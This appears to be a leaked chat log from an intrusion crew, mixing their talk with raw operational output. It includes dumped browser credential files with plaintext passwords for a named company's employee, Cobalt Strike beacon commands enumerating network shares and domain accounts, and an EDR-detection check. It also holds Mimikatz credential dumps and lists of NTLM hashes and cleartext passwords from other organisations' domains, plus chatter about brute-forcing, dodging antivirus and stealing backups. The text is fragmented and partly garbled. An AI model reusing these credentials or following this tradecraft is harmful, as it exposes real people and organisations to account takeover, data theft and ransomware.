C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.zendesk.com/,https://waterway.zendesk.com/auth/v2/login/email_verification,3/30/2019 8:15:40 AM,13198425340398832,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://atlas.technologypartners.net/,https://atlas.technologypartners.net/jira/login.jsp,4/18/2019 10:08:50 AM,13200073730330373,mharper,.V)59n-UW4#Y{6bY
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/,2/17/2017 11:09:05 AM,13131824945466325,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://ww5.autotask.net/,https://ww5.autotask.net/,9/11/2017 1:48:39 PM,13149629319827394,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://authentication.logmeininc.com/,https://authentication.logmeininc.com/,11/2/2017 10:23:35 AM,13154109815128559,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.zoho.com/,https://accounts.zoho.com/,7/5/2018 3:02:43 PM,13175294563791286,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://ntwkmtrpc/,http://ntwkmtrpc/,10/19/2017 11:09:13 AM,13152902953441972,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://wwsql01/,http://wwsql01/,1/8/2018 12:59:19 PM,13159911559498999,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.paycomonline.net/,https://www.paycomonline.net/,3/15/2018 11:38:53 AM,13165605533722509,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://mail.datotel.com/,https://mail.datotel.com/,5/23/2018 1:50:56 PM,13171575056275769,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.nationalcar.com/,https://www.nationalcar.com/,6/15/2017 10:55:12 AM,13142015712132139,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,http://gkeller.waterway.com:8080/,http://gkeller.waterway.com:8080/,10/24/2017 12:05:56 PM,1315333835356438715,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:8080/,http://localhost:8080/,2/17/2017 11:39:28 AM,1313182676868206820,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://sa.dor.mo.gov/,https://sa.dor.mo.gov/,3/7/2017 8:33:07 AM,13133370787764092,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/,8/28/2017 11:22:05 AM,13148410925787355,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.opentable.com/,https://www.opentable.com/,2/7/2017 3:51:28 PM,13130977888943168,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway1578930554.zendesk.com/,https://waterway1578930554.zendesk.com/auth/v2/login/signin,1/15/2020 10:05:51 AM,13223577951113149,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://app.hotschedules.com/,https://app.hotschedules.com/hs/login.jsp,3/2/2020 12:41:12 PM,132276478072628460,2120689,1534603
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.coach.com/,https://www.coach.com/,4/28/2020 1:34:44 PM,13232572484452463,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:3000/,http://localhost:3000/,4/29/2020 12:31:19 PM,13232655079442330,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://wwng-stage-ui.azurewebsites.net/,https://wwng-stage-ui.azurewebsites.net/,5/4/2020 12:29:24 PM,13233086964594837,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://onenote.officeapps.live.com/,https://onenote.officeapps.live.com/,5/26/2020 1:35:43 PM,13234991743323159,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaycarwash.monday.com/,https://waterwaycarwash.monday.com/,9/28/2020 2:16:42 PM,13245794202143373,,
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.facebook.com/,https://www.facebook.com/,9/28/2020 4:47:40 PM,13245803260898448,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://lastpass.com/,https://lastpass.com/,10/8/2020 8:47:08 AM,13246638428429684,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.mockflow.com/,https://www.mockflow.com/,11/9/2020 5:04:30 PM,13249436670654041,gkeller@waterway.com,Waterway99

````http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2`[ ](https://mediaeveryone.com/group/waterway-com?msg=yrYtJKNMZe8Cs4fL4) no, now we'll get everything ready and we can close``
--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W

--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 650000010503764
Password : u7i2jwPWZdfCwcU

--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

Do you have a lot to do here?
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec26 20:50:43> shell net view \\\DRB2 /all
[*] Tasked beacon to run: net view \\\DRB2 /all
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \\DRB2



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
Archive Disk
Backup Disk
C$ Disk Default share
E$ Disk Default share
Install Disk
IPC$ IPC Remote IPC
Log Disk
MailMerge Disk
Media Disk
Replication Disk
SiteWatch Disk
The command completed successfully.

``````
\DRB2\Archive
\DRB2/Backup
\\Replication
```
more backups
GKELLER.WATERWAY.COM
MIKEP16.WATERWAY.COM
BLAUERPC.WATERWAY.COM
U06NEWOFFICEPC.WATERWAY.COM
MHARPERNEW.WATERWAY.COM
``user3@tl1
add @user3 here please ``SYSTEM *@192.168.0.222 (WWDC2)``failed ?give me the pass to the session if there is no note there,and check the dca,ok now you'll get the rest on the rt? that's it,a tb and a half,you'll score it,4405 File(s) 1,452,604,853,672 bytes
``hiter fox`` how? AB - beatdefender
veeam - veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
with the hypervisor still figuring it out
found a way to jump over the cars so AB doesn't get fucked up (I don't know if it's too paly or not) av, viam, etc. we get it about the backups) what do we have here?
[+] Determining what EDR products are installed on wwdc2...
[+] gzflt.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] BitDefender Found!
``If the admin had hand-wiped all the sessions would have been dropped from the domain in the CHSon monitors activity and alertite a means of monitoring the Solarwinds like monitoring edkveri said tried to jump on the car and the dll av ate it, although when I looked at the tasklist there was nothing like that, hv I found what is it?
Shared resources at \\WWSQL2

My business server

Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
barcode Disk
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Company Disk Company
E$ Disk Default share
F$ Disk Default share
File History Backups Disk File History Backups
Folder Redirection Disk Folder Redirection
FTP Disk
G$ Disk Default share
IPC$ IPC Remote IPC
Shared Folders Disk
TrackIt Disk
Users Disk Users
``````
Server Name Remark

-------------------------------------------------------------------------------
\ANDREWNEW
\BLAUERPC BLauerPC
\CATHYDESKTOP
\CATHYNEW
\CBUSERPC
\CSTORENEW
\DANIELLEMOYNE
\\DAVESOFFICEPC
\\DJARDEN
\\DJBROWNXPS
\DRB2
\\GKELLER
\\HERYSNEWPC
\\ITPROGRAMS
\IWASH99
\\JAMIENEW
\\KCANTRELLNEW
\\KEVINPC
\\LAB-OFFICE
\\LLOYALTYTEST
\\LWINSTON
\MACMINI-EDC269 Waterway's Mac mini
\MARKETINGNEW
\MELISSASNEWPC
\MHARPERNEW
\MIKEGNEWPC
\MISSYSNEWPC
\MORNINGREPORTPC
\MUNGERPC
\MWEISSDESKTOP
\MWITKOWSKINEW
\NEWPCFORSOMEONE
\NTWKMTRPC
\\PDIPRODSQL
\\PDIPRODWEB
\RECRUITINGNEW
\REPORTING
\STEPHANIENEW
\STEVENEW
\TIFFANYSNEWPC
\TRAININGPCSTL
\TSHERIDANNEWPC
\WW2K1
\WWDC1
\WWDC2
\WWHV01
\WWHV02
\\{\WWHV03
\WWHV04
\WWSQL
\\My business server
``Okay, you can give it away to anyone, it's just your personal coba you're responsible for.
hitark.com
192.254.76.130:40500
JR7z0rUubsFGZ1TwELuQdisQB6oFbULFoX
``There's three of us, why can't the others give it to us?:frowning2:-``
Task SvcRestartTask#31841 2/4/2021 3:40:16 PM Ready
``Tried again to drop the fix, check it out.
```
	CORP.TELEVISA.COM.MX 10.254.0.116 SYSTEM * CORPKLHLRSD01
```
tuxomibo.com is pinged to level 3
kalarada.com up to 3 not pinged, only 1a, then it makes sense brute force hash found today you originally had it? + alive? there in general mush
Checked the domains, there's only one.
```
* Username : ctxdbadmin
	 * Domain : CORP
	 * NTLM : 7106c947d3a8abbea16cb5448f4ac00a
and then brut) check their accesses first start with domain and local and there LA domain users? )))) the main thing do not confuse password incorrect and access deiniedda, in the process and check on the other servers but take LA on servers where you can get a strange and he went straight to the lock? 1 you 19 times tried?

Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 120
Minimum password length: 12
Length of password history maintained: 6
Lockout threshold: 20
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP
The command completed successfully.


Give more net associates with their hash on the servers take take not touch it then, ok I did not try the hash a second time, there is apparently a lockout on it 1 try
I will lock it again at the same timePlus check this hash for those who are in the Servicio Basico group and in the Domain Admins group
Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
```
i would see who these two are, and if they are important, i would check hash of them too? so the session weighs with the old password. take a moment) yes?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Xa5s9pour2AfZ9FoF) new la like dirt
Username : ES050616C
	 * Domain : CORP
	 * NTLM : b7f8b9d8041930f6daed7cb3fb20c6d3
After I slipped on dc))))
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Locked
Account expires Never

Password last set 2/4/2021 1:06:21 PM
Password expires 6/4/2021 1:06:21 PM
Password changeable 2/5/2021 1:06:21 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/27/2021 10:13:01 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
The command completed successfully.
```

in 10 min
```

beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Yes
Account expires Never

Password last set 2/4/2021 1:23:14 PM
Password expires 6/4/2021 1:23:14 PM
Password changeable 2/5/2021 1:23:14 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/27/2021 10:13:01 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
The command completed successfully.
``and net user on itpochit please show what is the login to this YES whose hash was the new local admins?(and now there is no august1vhere is a seasonal passchekniklila no, on cmd5 did not check clear7 have a hash? in general, there are a couple of cars where went YES, you need to monitor them got out of the user segment of the servers
Found a server with a YES session, but it's been there since August and the password was changed long ago.
CORP\aloar Televisa.2021
CORP\gadiazc Soyelnumero0000001
CORP\kigarciap:::e0d8d7fcb35d2ef4920964532118f4f3:::
CORP\aftapiam:::0246bdc62f0e2c396384b592ef3be354:::
CORP\rsolanobau:::9d057d6ae0251a7c6d0674b26c9aa75c:::
CORP\Vmorenov:::a5bcd1c15d403fbf5c792c66f202e622:::
CORP\jccanoa:::78b75076afd20b0c1765db06e49c9715:::
CORP\clmendozav:::c933798f947972ca9d08ba805008d6ca:::
CORP\evazquezpr:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Gcastillom:::2441d700356f3ab1d0714db1e9844e60:::
CORP\cagiront:::749ceaca0433d984e0b78c7599a42886:::
CORP\cihernandeza:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Csegovia:::4efa1df1fdfb9a4ffbda0d00e840ede2::
CORP\Jrivass:::30fe4ab34ce80404f75465fb1b8cb12a:::
CORP\jrortizc:::fff70ea26ce69ae4c02bdce9ef8a4f61:::
CORP\ndjesusg:::34f21309ef327ecd9a852cfb510f4e6d:::
CORP\prangell:::4c07f34762110fa682bd0c6ef54e010d:::
CORP\iperezj:::f651f76a6a087c44698d7741b69c8fa3:::
CORP\Mfremontp:::c4f89225237628041d2303a26ee14007:::
CORP\cmgarciaa:::2029d906714ba0e913d30998533c9063:::
CORP\lgtoledol:::fe2969a54e98a468459022084143e1ec:::
CORP\jvelazquezg:::956e44f5069e8f0161ea7064840894ff:::
CORP\Aventuraj:::5d1dd74b6aeba7121e9324b1285d3739:::
CORP\Fmartinezg:::d9e8da2bb0bf67e9d076f09e29b26a1a:::
CORP\aloar:::4affd6e3e410086d3118d4dfa2ff931a:::
CORP\rcervantesm:::afd011d72ad1a55831d75f33be36d105:::
CORP\Jgonzalezv:::bec80eaa1dcee1f870dfc02808aa1afb:::
CORP\iaguilarr:::4548dea50cdb68bb9e206e4ac758edf3:::
CORP\crayonrod:::9675375a5bd161cd3ca09b9da344b372:::
CORP\jbarrerame:::587ddf743d86b13146415c77106686cf:::
CORP\jmpuentesc:::f93291f941f5387b4dde806e44970a62:::
CORP\chhbautistar:::ecb44fba43525518fd81fbf4453d650b:::
CORP\ammezar:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\gadiazc:::0e4c74096d9998c7a537509f481ee9da:::
CORP\sicabreram:::80537e6fc5a1f37f6ea4b0210af893c5:::
CORP\legutierrezg:::8a40ed074d59774f020fca6ac58d44d5:::
CORP\aafloresga:::986c69e34ac0935fcd39130ff05ad035:::
CORP\vigomezar:::6003c2feccf5eda3bdd18e373885524b:::
CORP\gemorenop:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\eamunozc:::decb62a34748b1dbbfc29124b545cfbc:::
CORP\gafloresso:::cac5c182593a480a05ba20a4e3b197a5:::
CORP\vperezg:::2e8b36ddd8932fa1bf97fa477d5bc565:::
CORP\jorget_wipro:::6460ac17a883c93ed07db8434ddc3f03:::
FILIAL\bmramirezs:::28ccd6f27c8c92346957931f94a1075d:::
FILIAL\pvhernandeza:::8aab1daa12e415eb9a9ad3cbf1692d71:::
FILIAL\Anavarretea:::5cb20c880326791e424fc9f2554ae9b4:::
FILIAL\RociodelaLuzC:::2f4b6c1b63ab9540eb7e087bc0cc2e61:::
``pcsb.org - conf conf conf conf @user3 vpn in work, can you to it + give a sense of help? to helpport)[ ](https://mediaeveryone.com/channel/general?msg=M3Wiw2qsSajQRKZ29) this is where? if today will update configs on vpn, give in work go to sapuga (went home aunt, apparently ... + disassembled?update injectorobnobrazovaniye new coba ?I1 person needdo add to the chat in `CORPSFECRT04` if available krch, if vpn enabled immediately jump to `CORPKIOVDAPGM01` putilkinaet silkodelevisa flew[ ](https://mediaeveryone.com/channel/general?msg=8oQfYvwK867aCbLo3) Lunch is long I went to the drugstore)
after delivery so to speak, right behind the activated charcoal here came to work, had lunch and went home) lunch... everyone left sharply) yeah fuck) @user7 go smoke alone here)) then @user7 give the silk code[ ](https://mediaeveryone.com/channel/general?msg=qn5jrsA9jZxjAvG76) before the store probably give 1 kobe to replace the long? he came out@user9 you only kobe died yesterday? i already filthy kopech... i think only vuduka what kobe participated in the lot yesterday?give silkoda later will be? so far nothing to give out additional (all past (re-run all past? do through the old designs now the whole list will go through and will write back what the hell + @user7 also vpn@user3 will give vpn for work so, we have 2 people without a job?i will also put invey, but i have not decided where i will try to determine who the admin is, so i can determine whether they outsource or neta what is in sccy besides monitoring? in sccy user4, there is also monitoring
i'm only in sccy what are the rest of them doing? @user9 in snu and sssutak about todaya don't remember there at all whining
I'm gonna check the splotches? Yeah, I've checked them all.
no vulnerabilities
ms17, net_api, smbghost, rdp exploits, snu.edu what's left to check?
I have one session from there, no dk, nothing pinged there is a vpn snu.edusccy of the activeWhat? I have a vpn written out for you, but I do not see any information about itIt's a couple of questions to youDay))) as a minimum coffee drink a current tasks what? do not understand you do not work?) I guess on the waya where everything?)
```
强制用户在时间到期之后多久必须注销?: 从不
密码最短使用期限(天): 0
密码最长使用期限(天): 42
密码长度最小值: 0
保持的密码历史记录长度: None
锁定阈值: 从不
锁定持续时间(分): 2
锁񛦩观测窗口(分): 2
计算机角色: WORKSTATION
命令成功完成。

``DC.
```
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 HZ-DC03 10.246.3.33
 HZ-DC04 10.246.3.34
 BJ-DC03 10.238.8.100
 BJ-DC04 10.238.0.100
 HZ-EQDC08 10.246.101.34
 HZ-EQDC07 10.246.101.33
``````

Authentication Id : 0 ; 554893 (00000000:0008778d)
Session : Interactive from 1
User Name : wb.zhangna
Domain : CN
Logon Server : HZ-EQDC08
Logon Time : 2020/10/26 23:27:44
SID : S-1-5-21-1380817616-3362833225-652976467-106526
	msv :
	 [00000003] Primary
	 * Username : wb.zhangna
	 * Domain : CN
	 * NTLM : 985de1088d5d619c783802e87d1dfea1
	 * SHA1 : 89d60fa07d36dc39fbf2f516b74514db08e25b38
	 * DPAPI : c5af9cdc18387afefdc1024f86b99ed1
	tspkg :
	wdigest :
	 * Username : wb.zhangna
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : wb.zhangna
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 553900 (00000000:000873ac)
Session : Interactive from 1
User Name : wb.zhangna
Domain : CN
Logon Server : HZ-EQDC08
Logon Time : 2020/10/26 23:27:44
SID : S-1-5-21-1380817616-3362833225-652976467-106526
	msv :
	 [00000003] Primary
	 * Username : wb.zhangna
	 * Domain : CN
	 * NTLM : 985de1088d5d619c783802e87d1dfea1
	 * SHA1 : 89d60fa07d36dc39fbf2f516b74514db08e25b38
	 * DPAPI : c5af9cdc18387afefdc1024f86b99ed1
	tspkg :
	wdigest :
	 * Username : wb.zhangna
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : wb.zhangna
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 92375 (00000000:000168d7)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2020/10/26 23:27:37
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad36e6d0a
	tspkg :
	wdigest :
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	credman :

Authentication Id : 0 ; 92331 (00000000:000168ab)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2020/10/26 23:27:37
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad36e6d0a
	tspkg :
	wdigest :
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : HIH-D-22925$
Domain : CN
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad36e6d0a
	tspkg :
	wdigest :
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : hih-d-22925$
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	* kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 63722 (00000000:0000f8ea)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-96-0-1
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad36e6d0a
	tspkg :
	wdigest :
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	credman :

Authentication Id : 0 ; 63689 (00000000:0000f8c9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-96-0-0
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad36e6d0a
	tspkg :
	wdigest :
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
